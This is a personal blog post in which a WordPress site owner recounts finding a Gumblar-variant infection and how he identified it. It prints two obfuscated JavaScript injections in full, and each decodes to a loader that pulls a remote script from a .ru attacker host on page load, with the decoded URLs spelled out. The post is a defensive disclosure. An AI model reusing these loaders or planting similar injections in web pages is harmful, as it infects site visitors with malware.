It happened since yesterday. When I was checking my blogs, I got this error message in every page.

Parse error: syntax error, unexpected ‘<’ in /home/$myhomedir$/public_html/wp-includes/default-widgets.php on line 1034

I immediately open default-widgets.php in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I’m very susprised when I found these codes were exist in default-widgets.php.

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

I also found similar malicious code from Google.

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

The 1st code above will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/, while the 2nd code above will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

I could accessing my iPhone blog, though another error appeared:
Can not modify header information – headers already sent by (output started at …
At the same time, InternetDownloadManager asked me to download ChangeLog.pdf from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/pics/ChangeLog.pdf and MBAM (Malwarebytes’ Anti-Malware) detected C:\Documents and Settings\username\Local Settings\Temp\0.5147965079164781.exe (random file name) as Trojan.Dropper. Kaspersky Anti-Virus 2009 couldn’t detect it, but Kaspersky Anti-Virus 2010 detected it as unknow threat UDS: DangerousObject.Multi.Generic with High criticality.

I understand that I was being infected by a virus, though I had no idea what kind of virus was that. Searched via Google by using <script>/*GNU GPL*/ try{window.onload as a keyword, didn’t help much, while using setAttribute(‘id’, `myscript1`) just displaying list of websites, which has been infected. Last but not least, I used setAttribute(‘id’, `myscript1`) virus as keyword, then it refer me to WebHostingTalk.nl. I got a little enlightenment about what I was dealing with.

So, its name is Gumblar. You can find further information about Gumblar on Unmask Parasites Blog, Wikipedia, or ISS.net. I got alot of useful information.
However, I might be infected by its variant, because it wasn’t inject iframe, no base64 code, no images.php file, and even different code.

The one I got spreading itself by infected all javascript files (*.js) and index files (*index*, *default*). www.ryan-isra.net, which is hosted on same hosting also infected. So far, I suspected that either my Windows XP has infected a keylogger or someone is sniffing my network traffic

Now, my wordpress blog has been disinfected.

Related Posts

1. How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)
2. Moving www.ryan-isra.net to a new Webhosting
3. SMS Verification needed for Gmail Registration
4. What is Sitemap? What is Benefits of Sitemap?
5. SEO Pager + YARP plugins causing WordPress SQL error

written by Ryan Isra \\ tags: javascript, malicious, security, virus, website, wordpress, www.ryan-isra.net